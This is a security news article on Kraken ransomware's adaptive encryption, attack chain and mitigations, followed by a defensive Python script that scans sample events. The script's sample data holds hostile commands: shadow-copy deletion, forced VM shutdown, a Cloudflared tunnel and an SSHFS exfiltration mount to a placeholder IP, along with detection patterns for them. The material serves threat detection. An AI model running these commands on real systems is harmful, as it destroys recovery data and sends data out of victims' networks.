Kraken Ransomware Evolves With System Benchmarking, Cisco Warns

Kraken ransomware benchmarks system performance to choose full or partial encryption, enabling efficient data theft and encryption across Windows, Linux, and VMware ESXi networks globally.

    Kraken ransomware, which targets Windows and Linux/VMware ESXi systems, is actively using a system benchmarking process to determine the most efficient method for encrypting data without overloading victim machines. Researchers say this capability represents an advanced and uncommon feature among ransomware families, allowing attackers to maximize damage while reducing the likelihood of triggering alerts or system crashes.

    Cisco Talos researchers first highlighted Kraken’s adaptive encryption functionality, explaining that the malware creates temporary files on each machine, encrypts them in a timed operation, and deletes them to measure system performance. The ransomware then uses these results to decide whether to perform full or partial encryption.

    “This adaptive encryption technique allows Kraken to deal maximum damage efficiently, without overwhelming system resources or alerting defenders,” said Cisco Talos researchers.

    Kraken emerged in early 2025 as a continuation of the HelloKitty ransomware operation, engaging in big-game hunting attacks that combine data theft with double-extortion tactics. Victims listed on Kraken’s leak sites span the United States, United Kingdom, Canada, Panama, Kuwait, and Denmark. Cisco notes multiple similarities with HelloKitty, including ransom note formatting and internal code references, indicating that Kraken represents a rebranding following the leak of HelloKitty’s source code. In addition to ransomware deployment, Kraken operators have launched a new cybercrime forum, “The Last Haven Board,” to facilitate communications among threat actors.

    Kraken Attack Chain and Lateral Movement

    According to Cisco, Kraken attacks often begin with the exploitation of SMB vulnerabilities on internet-facing assets, providing attackers with an initial foothold. Following initial access, intruders extract administrative credentials and use Remote Desktop Protocol (RDP) along with Cloudflared and SSHFS tools to expand their presence within the network. Cloudflared establishes reverse tunnels from compromised machines to attacker-controlled infrastructure, while SSHFS allows data exfiltration through mounted remote filesystems.

    Once inside the network, Kraken operators use persistent Cloudflared tunnels and RDP connections to move laterally, targeting all reachable systems to steal valuable data and prepare for ransomware deployment. Prior to initiating encryption, Kraken removes shadow copies, clears the Recycle Bin, and stops backup services to prevent recovery.

    Adaptive Encryption and System Assessment

    The ransomware’s adaptive approach benchmarks each machine individually. Temporary files containing random data are created and encrypted to measure performance, allowing the malware to select full or partial encryption depending on the system’s capabilities. Cisco researchers emphasize that this method ensures that encryption proceeds efficiently while avoiding resource overload, which could alert administrators or trigger defensive measures.

    “By tailoring the encryption process to the performance of each host, Kraken operators can maximize impact without detection,” Talos noted.

    Windows Encryption Modules

    The Windows version of Kraken includes four primary modules for targeting data:

    • SQL Database Module: Detects Microsoft SQL Server instances through registry keys, locates database file directories, verifies paths, and encrypts SQL data files.
    • Network Share Module: Enumerates accessible network shares via WNet APIs, excluding ADMIN$ and IPC$, and encrypts all other reachable shares.
    • Local Drive Module: Scans available drive letters, targeting fixed, removable, and remote drives using multithreaded encryption for speed and efficiency.
    • Hyper-V Module: Uses embedded PowerShell commands to list virtual machines, forcibly stops running VMs, and encrypts associated virtual disk files.

    Linux and VMware ESXi Behavior

    On Linux and VMware ESXi systems, Kraken enumerates running virtual machines, terminates them to release disk files, and applies multi-threaded encryption using the same benchmarking logic. The malware supports full or partial encryption based on the performance test, ensuring minimal disruption to system stability while maximizing damage.

    After encryption, Kraken executes a self-cleaning script, bye_bye.sh, to remove logs, shell history, the ransomware binary, and the script itself. Encrypted files have the .zpsc extension appended, and a ransom note (readme_you_ws_hacked.txt) is dropped in impacted directories. In one observed case, the ransom demand reached $1 million in Bitcoin.

    Indicators of Compromise and Mitigation

    Cisco researchers have published full indicators of compromise (IoCs) associated with Kraken ransomware on GitHub. Administrators are advised to look for unusual RDP activity, unexpected SSHFS or Cloudflared connections, and temporary files consistent with benchmarking behavior. Preventing exposure of SMB services, restricting RDP access, and monitoring network shares can help mitigate the risk of infection.
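    As an added illustration of the hunting advice above (this is not code from Cisco Talos or from the article), the script below runs a handful of behavior rules drawn from the article over constructed process and file events: Cloudflared tunnels and SSHFS mounts, shadow-copy deletion and forced Hyper-V VM stops before encryption, and the .zpsc extension, ransom note and bye_bye.sh artifacts afterwards. The event format, hostnames and command lines are assumptions made for the example, and Stop-VM -Force is an assumed form of the embedded PowerShell the article mentions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from the Cisco Talos report): one event per
# line as kind|host|detail, where kind is "proc" (command line) or "file" (path).
SAMPLE_EVENTS = """\
proc|ws01|cloudflared.exe tunnel run --token <redacted>
proc|ws01|vssadmin.exe delete shadows /all /quiet
proc|hv02|powershell.exe -c "Get-VM | Stop-VM -Force"
proc|esx01|sshfs user@203.0.113.5:/drop /mnt/drop
file|ws01|C:\\Finance\\q3.xlsx.zpsc
file|ws01|C:\\Finance\\readme_you_ws_hacked.txt
file|esx01|/tmp/bye_bye.sh
proc|ws03|notepad.exe C:\\Users\\bob\\notes.txt
""".splitlines()

# Each rule: name, event kind it applies to, regex, and the attack phase from
# the article it corresponds to. Hyper-V cmdlet form is an assumption.
RULES = [
    ("cloudflared_tunnel", "proc", r"\bcloudflared(\.exe)?\b.*\btunnel\b", "lateral_movement"),
    ("sshfs_mount", "proc", r"\bsshfs\b", "exfiltration"),
    ("shadow_copy_deletion", "proc", r"\bvssadmin(\.exe)?\s+delete\s+shadows", "pre_encryption"),
    ("hyperv_forced_stop", "proc", r"powershell.*\bStop-VM\b.*-Force", "pre_encryption"),
    ("zpsc_extension", "file", r"\.zpsc$", "encryption"),
    ("kraken_ransom_note", "file", r"(^|[\\/])readme_you_ws_hacked\.txt$", "encryption"),
    ("bye_bye_cleanup", "file", r"(^|[\\/])bye_bye\.sh$", "cleanup"),
]
COMPILED = [(n, k, re.compile(p, re.I), ph) for n, k, p, ph in RULES]
IMPACT_PHASES = {"encryption", "cleanup"}  # artifacts that only appear after encryption ran

def scan(lines):
    """Return (host, rule_name, phase) for every event that matches a rule."""
    hits = []
    for line in lines:
        kind, host, detail = line.split("|", 2)
        for name, rkind, rx, phase in COMPILED:
            if kind == rkind and rx.search(detail):
                hits.append((host, name, phase))
    return hits

def triage(hits):
    """Split hosts into those already showing post-encryption artifacts and those
    showing only precursor activity, where isolation can still prevent impact."""
    phases = defaultdict(set)
    for host, _, phase in hits:
        phases[host].add(phase)
    impacted = sorted(h for h, p in phases.items() if p & IMPACT_PHASES)
    precursor = sorted(h for h, p in phases.items() if not p & IMPACT_PHASES)
    return {"impacted": impacted, "precursor_only": precursor}

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for host, name, phase in found:
        print(f"{host:6} {phase:17} {name}")
    print(triage(found))
```

    In practice the rules would be fed from EDR or Sysmon process-creation and file events rather than the constructed lines embedded here.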

    Kraken’s combination of adaptive encryption, multi-platform targeting, and big-game hunting makes it a particularly dangerous threat. Security teams are urged to ensure backups are up to date and stored offline, apply endpoint protections, and monitor network traffic for anomalous activity indicative of ransomware reconnaissance or lateral movement.